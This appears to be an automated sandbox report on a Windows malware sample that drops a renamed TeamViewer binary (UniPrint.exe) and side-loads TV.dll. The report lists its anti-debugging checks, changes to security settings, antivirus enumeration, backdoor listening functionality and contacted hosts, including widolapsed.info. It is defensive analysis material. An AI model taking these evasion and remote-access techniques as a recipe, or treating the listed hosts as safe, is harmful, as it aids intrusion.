Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 4_2_70982EF0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000003.00000002.512388496.0000024FAA829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000003.00000002.543297207.0000024FB0048000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.509995145.0000020167402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000007.00000002.511295701.0000020167428000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512172229.000001563502A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Open window title or class name: ollydbg
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B890 FreeLibrary,GetProcessHeap,HeapFree,HeapDestroy, 2_2_7098B890
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0051523A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00534A9B

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709854A0 LogonUserW,GetLastError,CloseHandle, 2_2_709854A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709834E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 2_2_709834E0
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program ManagerX
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program Manager4
Source: UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_xtoa_s@20, 4_2_0054113A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 4_2_0054E79D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA, 4_2_0054E87F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 4_2_0054E915
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 4_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 4_2_0054E987
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 4_2_0054EB57
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0054EC16
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 4_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_0054B459
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,74E3A680,lstrcat,lstrlen, 0_2_00405B88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_70988AF0

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.512252539.0000015E8B440000.00000004.00000001.sdmp Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510953306.0000015E8B413000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 4_2_00511D6F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483790 Sample: wogZe27GBB Startdate: 15/09/2021 Architecture: WINDOWS Score: 76 37 Multi AV Scanner detection for dropped file 2->37 39 Multi AV Scanner detection for submitted file 2->39 7 wogZe27GBB.exe 15 2->7         started        10 svchost.exe 2->10         started        13 svchost.exe 2->13         started        15 15 other processes 2->15 process3 dnsIp4 25 C:\Users\user\AppData\...\UniPrint.exe, PE32 7->25 dropped 27 C:\Users\user\AppData\Roaming\...\TV.dll, PE32 7->27 dropped 29 C:\Users\user\...\Teamviewer_Resource_ja.dll, PE32 7->29 dropped 18 UniPrint.exe 7->18         started        47 Changes security center settings (notifications, updates, antivirus, firewall) 10->47 21 MpCmdRun.exe 10->21         started        49 DLL side loading technique detected 13->49 31 master12.teamviewer.com 185.188.32.22, 49746, 49747, 49748 TEAMVIEWER-ASDE Germany 15->31 33 widolapsed.info 45.153.241.148, 443, 49752, 49753 COMBAHTONcombahtonGmbHDE Germany 15->33 35 4 other IPs or domains 15->35 file5 signatures6 process7 signatures8 41 Tries to detect sandboxes and other dynamic analysis tools (window names) 18->41 43 Creates processes via WMI 18->43 45 Contains functionality to detect sleep reduction / modifications 18->45 23 conhost.exe 21->23         started        process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.188.32.22
 master12.teamviewer.com Germany
43304 TEAMVIEWER-ASDE false
188.172.198.151
 unknown Austria
42473 AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT false
45.153.241.148
 widolapsed.info Germany
30823 COMBAHTONcombahtonGmbHDE false

Private
IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
master12.teamviewer.com 185.188.32.22 true
widolapsed.info 45.153.241.148 true
ping3.dyngate.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate false
  • Avira URL Cloud: safe
 unknown
http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== false
    		high
    http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 false
    • Avira URL Cloud: safe
    		 unknown
    http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 false
    • Avira URL Cloud: safe
    		 unknown
    http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002 false
      		high
      http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 false
        		high
        http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== false
          		high